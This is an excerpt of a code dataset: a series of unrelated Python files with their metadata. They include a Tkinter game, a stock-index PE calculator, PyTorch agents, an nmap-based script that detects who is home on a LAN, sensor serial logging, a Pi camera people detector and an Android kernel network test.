'drawing.png'\n self.image1.save(self.filename)\n self.image2 = ImageTk.PhotoImage(Image.open(\"drawing.png\").resize((200, 200)))\n self.image3 = Label(root, image=self.image2)\n self.image3.config(background=\"#d8dad9\")\n self.image3.grid_remove()\n self.top.withdraw()\n\n # Imported module functions\n introductions = introductions\n question_one = question_one\n question_one_yes = question_one_yes\n question_one_end = question_one_end\n question_one_no = question_one_no\n stage_one = stage_one\n create_window = create_window\n stage_two = stage_two\n stage_three = stage_three\n drawing_setup = drawing_setup\n paint = paint\n reset = reset\n stage_three_fail = stage_three_fail\n stage_four = stage_four\n stage_five = stage_five\n item_list = item_list\n\nmy_gui = GuessingGame(root)\nroot.config(background=\"#f0f5f5\", padx=20, pady=20)\nroot.mainloop()\n", "sub_path": "Bunny Tkinter App/main_file.py", "file_name": "main_file.py", "file_ext": "py", "file_size_in_byte": 3163, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "PIL.Image.new", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "attribute"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 73, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 73, "usage_type": "name"}]} +{"seq_id": "358895856", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# author: Xiaohan Li\n# info: 计算各指数等权PE和PB\n\n\nimport sys\nimport os\nimport traceback\nimport pandas as pd\nimport numpy as np\nimport sqlite3 as sq\nfrom datetime import *\nfrom dateutil.relativedelta import *\n\nimport Common\nimport EvalUtils\nimport SqliteUtils\n\n\ndef run(CONFIG, opts, args):\n sqConn = sq.connect(CONFIG['sqlite.path'])\n\n calcDays = int(os.getenv('CALC_DAYS', '30'))\n fillMiss = os.getenv('FILL_MISS', 'False')\n today = datetime.date(datetime.now())\n\n # 指定某个基金代码,计算这个指数的等权PE和PB\n indexCode = os.getenv('INDEX_CODE', None)\n if indexCode:\n indexLst = [indexCode]\n else:\n print('Get all index PE')\n df = pd.read_csv('./data/index.csv')\n indexLst = df['index_code'].values.tolist()\n\n startDay = today - relativedelta(days = calcDays)\n # 从1995年开始计算PE和PB,与E大的图保持统一\n if startDay < date(1995, 1, 1):\n startDay = date(1995, 1, 1)\n firstDay = startDay.replace(day = 1)\n print('Calculate index PE from: %s' % firstDay)\n firstDayStr = firstDay.strftime('%Y%m%d')\n endDay = today.replace(day = 1)\n allEvalDF = SqliteUtils.getConEval(sqConn, firstDayStr)\n print(allEvalDF.head(3))\n print(allEvalDF.dtypes)\n for indexCode in indexLst:\n print(indexCode)\n firstConLst = None\n firstValidDay = None\n conDF = SqliteUtils.getConOfIndex(sqConn, indexCode)\n print(conDF.head(3))\n day = firstDay\n while day <= endDay:\n intDay = int(datetime.strftime(day, '%Y%m%d'))\n conLst = EvalUtils.getConLst(conDF, indexCode, intDay)\n if len(conLst)>0 and firstConLst == None:\n firstConLst = conLst\n firstValidDay = day\n conEvalDF = allEvalDF[((allEvalDF.trade_dt == intDay)\n & allEvalDF['con_code'].isin(conLst))]\n # print(len(conEvalDF))\n if len(conEvalDF) > 0:\n dayPE = EvalUtils.calcPEWoNeg(conEvalDF)\n dayPB = EvalUtils.calcPBWoNeg(conEvalDF)\n # print('%s %.2f' % (day, dayPe))\n dayDF = pd.DataFrame([[intDay, dayPE, dayPB]], columns=['dt', 'pe', 'pb'])\n SqliteUtils.writeIndexEwEval(sqConn, dayDF, indexCode)\n day = day + relativedelta(months = 1)\n \n # fill 10 years' pe before firstValidDay\n if fillMiss == 'False':\n print('do not fill')\n continue\n elif fillMiss == 'True':\n print(indexCode, 'First valid day',firstValidDay,\n 'len of firstConLst', len(firstConLst))\n day = firstValidDay - relativedelta(years=10)\n # 主要是行业指数需要补齐,补齐至2005年,与E大保持一致\n if day < date(2005, 1, 1):\n day = date(2005, 1, 1)\n print('fill from', day)\n while day <= firstValidDay:\n intDay = int(datetime.strftime(day, '%Y%m%d'))\n conEvalDF = allEvalDF[((allEvalDF.trade_dt == intDay)\n & allEvalDF['con_code'].isin(firstConLst))]\n if len(conEvalDF) > 0:\n # print(day, 'len of conEvalDF', len(conEvalDF))\n dayPE = EvalUtils.calcPEWoNeg(conEvalDF)\n dayPB = EvalUtils.calcPBWoNeg(conEvalDF)\n # print('%s %.2f' % (day, dayPe))\n dayDF = pd.DataFrame([[intDay, dayPE, dayPB]], columns=['dt', 'pe', 'pb'])\n SqliteUtils.writeIndexEwEval(sqConn, dayDF, indexCode)\n else:\n print('empty con eval', indexCode, day)\n day = day + relativedelta(months=1)\n\n\n\nif __name__ == \"__main__\":\n try:\n (CONFIG, opts, args) = Common.process_options()\n run(CONFIG, opts, args)\n except Exception as e:\n traceback.print_exc(file=sys.stdout)\n print(\"Job Error %s:\" % (e.args))\n raise e\n finally:\n pass\n", "sub_path": "index-eval/bin/CalcIndexPEAndPB.py", "file_name": "CalcIndexPEAndPB.py", "file_ext": "py", "file_size_in_byte": 4099, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sqlite3.connect", "line_number": 23, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 25, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 27, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "SqliteUtils.getConEval", "line_number": 46, "usage_type": "call"}, {"api_name": "SqliteUtils.getConOfIndex", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.strftime", "line_number": 57, "usage_type": "call"}, {"api_name": "EvalUtils.getConLst", "line_number": 58, "usage_type": "call"}, {"api_name": "EvalUtils.calcPEWoNeg", "line_number": 66, "usage_type": "call"}, {"api_name": "EvalUtils.calcPBWoNeg", "line_number": 67, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "call"}, {"api_name": "SqliteUtils.writeIndexEwEval", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.strftime", "line_number": 86, "usage_type": "call"}, {"api_name": "EvalUtils.calcPEWoNeg", "line_number": 91, "usage_type": "call"}, {"api_name": "EvalUtils.calcPBWoNeg", "line_number": 92, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 94, "usage_type": "call"}, {"api_name": "SqliteUtils.writeIndexEwEval", "line_number": 95, "usage_type": "call"}, {"api_name": "Common.process_options", "line_number": 104, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 107, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 107, "usage_type": "attribute"}]} +{"seq_id": "256959863", "text": "import torch\nimport random\n\n\nclass Softmax_Agent(torch.nn.Module):\n def __init__(self, model=None, batch=128, head=None):\n super(Softmax_Agent, self).__init__()\n self.model = model\n self.n_agents = 1\n self.batch = batch\n self.transition_keys = [\"state\", \"action\", \"reward\", \"logit\", \"entropy\", \"value\"]\n self.p_state = 0\n self.single_step = False\n self.head = head\n self.steps = 0\n self.action = -1\n\n def step(self, x, memory, confidence, render, explore=False):\n ys = []\n infos = {}\n\n y, logit, entropy = self.forward(x, confidence, render, explore)\n memory.add_value((\"logit\",logit[0]))\n memory.add_value((\"entropy\",entropy[0]))\n self.steps += 1\n return y, infos\n\n def forward(self, x, confidence=1.0, render=False, explore=False):\n actions = []\n logits = []\n entropies = []\n\n if type(self.p_state) != torch.tensor:\n x = torch.cat((x, x),dim=1)\n else:\n x = torch.cat((x, self.p_state),dim=1)\n\n self.p_state = x\n\n y = self.model(x)\n\n if self.head != None:\n y = self.head(y.view(self.n_agents,-1))\n\n y = torch.nn.Softmax(dim=1)(y.view(self.n_agents,-1))\n\n for z in list(y):\n dist = torch.distributions.Categorical(z)\n anxiety = torch.nn.Sigmoid()(torch.randn(1))\n\n if confidence < anxiety or self.steps < 1:\n self.action = dist.sample()\n confidence = 5.0\n mode = \"Explore\"\n else:\n if explore:\n pass\n else:\n self.action = torch.argmax(dist.probs)\n mode = \"Exploit\"\n\n #if render:\n # print(\"{}% Action {}\".format(int(100*y[0][action]), action))\n\n logit = -dist.log_prob(self.action).view(-1)\n logits.append(logit)\n actions.append(self.action)\n entropies.append(dist.entropy())\n if self.single_step:\n print(\"Step:{} Action:{} Prob:{} LogProb:{} Confidence:{} Mode:{}\".format(self.steps, self.action, z[self.action], logit, confidence, mode))\n input()\n\n return actions, logits, entropies\n\nclass Softmax_RNN_Agent(torch.nn.Module):\n def __init__(self, in_features, hidden, layers, model=None, batch=128, n_agents=1):\n super(Softmax_RNN_Agent, self).__init__()\n self.model = model\n self.hidden_size = hidden\n self.layers = layers\n self.rnn = torch.nn.GRU(in_features, hidden, layers)\n self.memory = []\n self.n_agents = n_agents\n self.batch = batch\n self.transition_keys = [\"state\", \"action\", \"reward\", \"logit\", \"entropy\", \"value\"]\n self.p_state = 0\n self.hidden = torch.zeros(self.layers, 1, self.hidden_size)\n\n def push(self, transition):\n self.memory.push(transition)\n\n def step(self, x, memory):\n ys = []\n infos = {}\n\n y, logit, entropy = self.forward(x)\n memory.add_value((\"logit\",logit[0]))\n memory.add_value((\"entropy\",entropy[0]))\n return y, infos\n\n def forward(self, x):\n actions = []\n logits = []\n entropies = []\n\n if type(self.p_state) != torch.tensor:\n x = torch.cat((x, x),dim=1)\n else:\n x = torch.cat((x, self.p_state),dim=1)\n\n self.p_state = x\n y,self.hidden = self.rnn(x, self.hidden)\n y = self.model(y)\n\n y = torch.nn.Softmax(dim=2)(y)\n\n for z in list(y):\n dist = torch.distributions.Categorical(z)\n action = dist.sample()\n logit = -dist.log_prob(action).view(-1)\n logits.append(logit)\n actions.append(action)\n entropies.append(dist.entropy())\n\n return actions, logits, entropies\n\n def reset_hidden(self):\n self.hidden = torch.zeros(self.layers, 1, self.hidden_size)\n\nclass RandomAgent():\n def __init__(self, actions):\n super(RandomAgent, self).__init__()\n self.actions = actions\n self.transition_keys = [\"state\",\"reward\",\"action\"]\n\n def forward(self, x):\n return (random.choice(range(self.actions)))\n", "sub_path": "agents.py", "file_name": "agents.py", "file_ext": "py", "file_size_in_byte": 4277, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.distributions.Categorical", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.nn.Sigmoid", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.randn", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torch.nn.GRU", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 106, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 115, "usage_type": "attribute"}, {"api_name": "torch.distributions.Categorical", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 118, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "209740820", "text": "# -*- coding: utf-8 -*-\n\nimport requests\nimport unittest\n\nclass test_kuaidi(unittest.TestCase):\n def setUp(self):\n self.header={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',}\n \n danhao = '494452070742'\n kd = 'zhongtong'\n self.url = 'http://www.kuaidi.com/index-ajaxselectcourierinfo-%s-%s.html'%(danhao, kd)\n \n \n def testsearch(self):\n r = requests.get(self.url, headers=self.header, verify=False)\n date = r.json()\n print(date)\n self.assertEqual(date['company'], '中通快递')\n ", "sub_path": "interface/src/test/test_seacrhkuaidi.py", "file_name": "test_seacrhkuaidi.py", "file_ext": "py", "file_size_in_byte": 620, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "120057985", "text": "#the Python Script was provided by : Jonathan De La Cruz https://www.linkedin.com/in/jonathandelacruz96/\r\n\r\n\r\nimport re\r\nimport subprocess\r\nimport time\r\nimport serial\r\nwhile True:\r\n dylan = 1\r\n lewis = 1\r\n lydia = 1\r\n justin = 1\r\n adr = []\r\n ser = serial.Serial('/dev/ttyUSB0') #serial\r\n # this runs commands in terminal that use nmap to print all terminal results into output.txt\r\n with open('output.txt', 'w') as f:\r\n p1 = subprocess.run(['sudo', 'nmap', '-sP', '***.*.*.0/**'], stdout=f, text=True)#i use stars to blank out my actual IP, replace with you own\r\n with open('output.txt', 'r') as searchFile:\r\n for line in searchFile:\r\n if 'MAC' in line:\r\n adr.append(line.rstrip('\\n'))\r\n with open('macAddresses.txt', 'w') as macFile:\r\n for mac in adr:\r\n macFile.write('%s\\n' %mac[:30])\r\n time.sleep(10) \r\n with open('macAddresses.txt', 'r') as macFile:\r\n time.sleep(2)\r\n with open('macAddresses.txt', 'r') as macFile:\r\n print('checking who is home...')\r\n for line in macFile:\r\n if '**:**:**:**:**:**' in line: #i use **:**:**:**:**:** to replace a real MAC address, replace with you own\r\n dylan = 2\r\n print('Dylan is here') #change this to whatever you want to happen\r\n ser.write(b'D') #sends character cast as byte over serial\r\n if dylan == 1 :\r\n print(' Dylan is not here') #change this to whatever you want to happen\r\n ser.write(b'd') #sends character cast as byte over serial\r\n time.sleep(2)\r\n with open('macAddresses.txt', 'r') as macFile:\r\n for line in macFile:\r\n if '**:**:**:**:**:**' in line:#i use **:**:**:**:**:** to replace a real MAC address, replace with you own\r\n lewis = 2\r\n print('Lewis is here') #change this to whatever you want to happen\r\n ser.write(b'L') #sends character cast as byte over serial\r\n if lewis == 1:\r\n print(' Lewis is not here') #change this to whatever you want to happen\r\n ser.write(b'l') #sends character cast as byte over serial\r\n time.sleep(2)\r\n with open('macAddresses.txt', 'r') as macFile:\r\n for line in macFile:\r\n if '4**:**:**:**:**:**' in line:#i use **:**:**:**:**:** to replace a real MAC address, replace with you own\r\n lydia = 2\r\n print('Lydia is here') #change this to whatever you want to happen\r\n ser.write(b'K') #sends character cast as byte over serial\r\n if lydia == 1 : \r\n print(' lydia is not here') #change this to whatever you want to happen\r\n ser.write(b'k') #sends character cast as byte over serial\r\n time.sleep(2)\r\n with open('macAddresses.txt', 'r') as macFile:\r\n for line in macFile:\r\n if '**:**:**:**:**:**' in line:#i use **:**:**:**:**:** to replace a real MAC address, replace with you own\r\n justin = 2\r\n print('Justin is here') #change this to whatever you want to happen\r\n ser.write(b'J') #sends character cast as byte over serial\r\n if justin == 1 :\r\n print(' justin is not here') #change this to whatever you want to happen\r\n ser.write(b'j') #sends character cast as byte over\r\n time.sleep(2)\r\n print('end of loop')\r\n ser.close()\r\n time.sleep(10)", "sub_path": "Python/whoishomescript.py", "file_name": "whoishomescript.py", "file_ext": "py", "file_size_in_byte": 3838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "serial.Serial", "line_number": 14, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 58, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "372254409", "text": "import serial #Import Serial Library\nimport time\nimport datetime\nimport csv\nimport numpy as np\n\nrun = '1'\ncount = 0\nbadSamples = 0\nNO_SAMPLES = 1000\nNO_SENSORS = 1\nSTART = 'S'\n\nHEADER = [ ['Sensor 1',' ',' ','Sensor 2',' ',' ','Sensor 3',' ',' ','Sensor 4',' ',' ','Sensor 5'],\n ['X','Y','Z','X','Y','Z','X','Y','Z','X','Y','Z','X','Y','Z'] ]\n\ndata_log = []\nlength = []\n\ntry:\n arduinoSerial = serial.Serial('/dev/tty.usbserial-DN018OOF',9600, 5) #Create Serial port object called arduinoSerialData\n print(\"Connected to Arduino\")\nexcept:\n print(\"Failed to connect to Arduino\")\n\narduinoSerial.reset_input_buffer()\narduinoSerial.reset_output_buffer()\ntime.sleep(5) #Required for the XBee's to initialise\n\ninput('Please press Enter to begin')\narduinoSerial.write(b'S')\n\nwhile (run == '1'):\n\t# If the input buffer is not empty read the data out into rawData using \\n as a delimiter.\n if (arduinoSerial.inWaiting()>0):\n rawData = arduinoSerial.readline()\n # Decode the bytes into a string\n data = rawData.decode()\n # Split the ID, x, y, z and newline values and put in a list\n data_readings = data.split(\" \", 5)\n print(data_readings)\n if (len(data_readings) == 5 and '' not in data_readings):\n int_data_readings = list(map(int,data_readings[:4]))\n data_log.append(int_data_readings)\n else:\n badSamples += 1\n\n # Take NO_SAMPLES samples then possibility to quit\n if (count == NO_SAMPLES):\n print('Lost Samples: ' + str(badSamples))\n run = input('Continue? (1:yes, 0:no)')\n count = 0\n count += 1\n\narduinoSerial.write(b'S')\narduinoSerial.close()\n\nnp_data_log = np.array(data_log)\n\nfor i in range(1,NO_SENSORS+1):\n length.append((np_data_log == i).sum())\n\nnp_difference = max(length) - np.array(length)\n\nfor i in range(0,NO_SENSORS):\n if (np_difference[i] != 0):\n for j in range(0,np_difference[i]):\n np_data_log = np.concatenate((np_data_log,[[i+1,0,0,0]]), axis=0)\n\nnp_data_sorted = np_data_log[:,[1,2,3]][np_data_log[:,0] == 1 ]\nfor i in range(2,NO_SENSORS+1):\n np_temp = np_data_log[:,[1,2,3]][np_data_log[:,0] == i ]\n np_data_sorted = np.concatenate((np_data_sorted,np_temp), axis=1)\n\ntimestamp = datetime.datetime.utcnow()\npathTime = '/Users/Angelo555uk/Desktop/University/Year_4/Project/Results/Sensor1log-{:%d%b,%H.%M}.csv'.format(timestamp)\n\npath = '/Users/Angelo555uk/Desktop/University/Year_4/Project/Results/Sensorlog.csv'\n\nwith open(path, 'w') as csv_file:\n csv_write = csv.writer(csv_file, dialect='excel')\n csv_write.writerows(HEADER)\n csv_write.writerows(np_data_sorted)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "Python/Serial_Test_MultiV2.py", "file_name": "Serial_Test_MultiV2.py", "file_ext": "py", "file_size_in_byte": 2697, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "serial.Serial", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 73, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 75, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "189533869", "text": "#!/usr/bin/env python3\n\nimport json\n\nfor file in ('binaries.json', 'binaries-prange.json',\n 'binaries-newspaper-pdf.json', 'binaries-newspaper-tiff.json'):\n\n c = {}\n\n with open(file, 'r') as fd:\n j = json.load(fd)\n\n for result in j['results']['bindings']:\n subject = result['subject']['value']\n size = int(result['size']['value'])\n\n if subject not in c:\n c[subject] = 0\n\n c[subject] += size\n\n\n l = sorted(c.items(), reverse=True, key=lambda x: x[1])\n\n total = 0\n print(file)\n for subject, size in l[:10]:\n print(subject, size)\n total += size\n print(f'total={total}')\n\n", "sub_path": "fcrepo/binaries.py", "file_name": "binaries.py", "file_ext": "py", "file_size_in_byte": 688, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.load", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "412177926", "text": "# import the necessary packages\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport time\nimport cv2\nimport numpy as np\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\ncamera.rotation = 180\ncamera.resolution = (640, 480)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=(640, 480))\n\nhog = cv2.HOGDescriptor()\nhog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\n\nout = cv2.VideoWriter(\n 'output.avi',\n cv2.VideoWriter_fourcc(*'MJPG'),\n 15.,\n (640,480))\n# allow the camera to warmup\ntime.sleep(0.1)\n# capture frames from the camera\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n # grab the raw NumPy array representing the image, then initialize the timestamp\n # and occupied/unoccupied text\n image = frame.array\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n # detect people in the image\n # returns the bounding boxes for the detected objects\n boxes, weights = hog.detectMultiScale(image, winStride=(8,8) )\n\n boxes = np.array([[x, y, x + w, y + h] for (x, y, w, h) in boxes])\n\n for (xA, yA, xB, yB) in boxes:\n # display the detected boxes in the colour picture\n cv2.rectangle(image, (xA, yA), (xB, yB),\n (0, 255, 0), 2)\n \n # Write the output video \n out.write(image.astype('uint8'))\n # show the frame\n cv2.imshow(\"Frame\", image)\n \n \n \n key = cv2.waitKey(1) & 0xFF\n # clear the stream in preparation for the next frame\n rawCapture.truncate(0)\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n \ncamera.close()\nout.release()", "sub_path": "drone/RegCamFeed.py", "file_name": "RegCamFeed.py", "file_ext": "py", "file_size_in_byte": 1710, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "picamera.PiCamera", "line_number": 9, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.HOGDescriptor", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.HOGDescriptor_getDefaultPeopleDetector", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 20, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "517669437", "text": "import functools\nimport time\n\ndef metric(fn):\n @functools.wraps(fn)\n def decorator(*args, **kw):\n t1 = time.time()\n result = fn(*args, **kw)\n t2 = time.time()\n print('%s executed in %s ms' % (fn.__name__, t2-t1))\n return result\n return decorator\n\n@metric\ndef fast(x, y):\n time.sleep(0.0012)\n return x + y;\n\n@metric\ndef slow(x, y, z):\n time.sleep(0.1234)\n return x * y * z;\n\nf = fast(11, 22)\ns = slow(11, 22, 33)\nif f != 33:\n print('测试失败!')\nelif s != 7986:\n print('测试失败!')\n\n\n#-----------------------------------------------\ndef ablog(fn):\n def func2():\n print('before call')\n result = fn()\n print('after call')\n return result\n return func2\n \n@ablog\ndef demod():\n print('I\\'m demod')\n\ndemod()", "sub_path": "decorator.py", "file_name": "decorator.py", "file_ext": "py", "file_size_in_byte": 808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 7, "usage_type": "call"}, {"api_name": "time.time", "line_number": 9, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 5, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "616112163", "text": "#!/usr/bin/env python\n#\n# Copyright (C) 2018 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport logging\nimport os\n\nfrom vts.runners.host import asserts\nfrom vts.runners.host import base_test\nfrom vts.runners.host import const\nfrom vts.runners.host import keys\nfrom vts.runners.host import test_runner\nfrom vts.utils.python.os import path_utils\n\n\nclass VtsKernelNetTest(base_test.BaseTestClass):\n \"\"\"Host test class to run android kernel unit test.\n\n Attributes:\n dut: AndroidDevice, the device under test.\n shell: AdbProxy, instance of adb shell.\n host_bin_path: string, path to test binary on the host.\n target_bin_path: string, path to test binary on the target.\n \"\"\"\n\n def setUpClass(self):\n required_params = [\n keys.ConfigKeys.IKEY_DATA_FILE_PATH,\n ]\n self.getUserParams(required_params)\n logging.info('%s: %s', keys.ConfigKeys.IKEY_DATA_FILE_PATH,\n self.data_file_path)\n\n self.dut = self.android_devices[0]\n self.shell = self.dut.adb.shell\n\n # 32-bit version of the test should only run against 32-bit kernel;\n # same for 64 bit.\n bin_path = ('nativetest64' if self.dut.is64Bit else 'nativetest',\n 'kernel_net_tests', 'kernel_net_tests')\n\n self.host_bin_path = os.path.join(self.data_file_path, 'DATA', *bin_path)\n self.target_bin_path = path_utils.JoinTargetPath('data', *bin_path)\n\n def tearDownClass(self):\n self.shell('rm -rf %s' % path_utils.TargetDirName(self.target_bin_path))\n\n def testKernelNetworking(self):\n \"\"\"Android kernel unit test.\"\"\"\n # Push the test binary to target device.\n self.shell('mkdir -p %s' % path_utils.TargetDirName(self.target_bin_path))\n self.dut.adb.push('%s %s' % (self.host_bin_path, self.target_bin_path))\n self.shell('chmod 777 %s' % self.target_bin_path)\n\n # Execute the test binary.\n result = self.shell(self.target_bin_path, no_except=True)\n\n logging.info('stdout: %s', result[const.STDOUT])\n logging.error('stderr: %s', result[const.STDERR])\n logging.info('exit code: %s', result[const.EXIT_CODE])\n asserts.assertFalse(\n result[const.EXIT_CODE],\n 'kernel_net_tests binary returned non-zero exit code.')\n\nif __name__ == '__main__':\n test_runner.main()\n", "sub_path": "test/vts-testcase/kernel/api/net/VtsKernelNetTest.py", "file_name": "VtsKernelNetTest.py", "file_ext": "py", "file_size_in_byte": 2918, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "vts.runners.host.base_test.BaseTestClass", "line_number": 29, "usage_type": "attribute"}, {"api_name": "vts.runners.host.base_test", "line_number": 29, "usage_type": "name"}, {"api_name": "vts.runners.host.keys.ConfigKeys", "line_number": 41, "usage_type": "attribute"}, {"api_name": "vts.runners.host.keys", "line_number": 41, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 44, "usage_type": "call"}, {"api_name": "vts.runners.host.keys.ConfigKeys", "line_number": 44, "usage_type": "attribute"}, {"api_name": "vts.runners.host.keys", "line_number": 44, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "vts.utils.python.os.path_utils.JoinTargetPath", "line_number": 56, "usage_type": "call"}, {"api_name": "vts.utils.python.os.path_utils", "line_number": 56, "usage_type": "name"}, {"api_name": "vts.utils.python.os.path_utils.TargetDirName", "line_number": 59, "usage_type": "call"}, {"api_name": "vts.utils.python.os.path_utils", "line_number": 59, "usage_type": "name"}, {"api_name": "vts.utils.python.os.path_utils.TargetDirName", "line_number": 64, "usage_type": "call"}, {"api_name": "vts.utils.python.os.path_utils", "line_number": 64, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}, {"api_name": "vts.runners.host.const.STDOUT", "line_number": 71, "usage_type": "attribute"}, {"api_name": "vts.runners.host.const", "line_number": 71, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 72, "usage_type": "call"}, {"api_name": "vts.runners.host.const.STDERR", "line_number": 72, "usage_type": "attribute"}, {"api_name": "vts.runners.host.const", "line_number": 72, 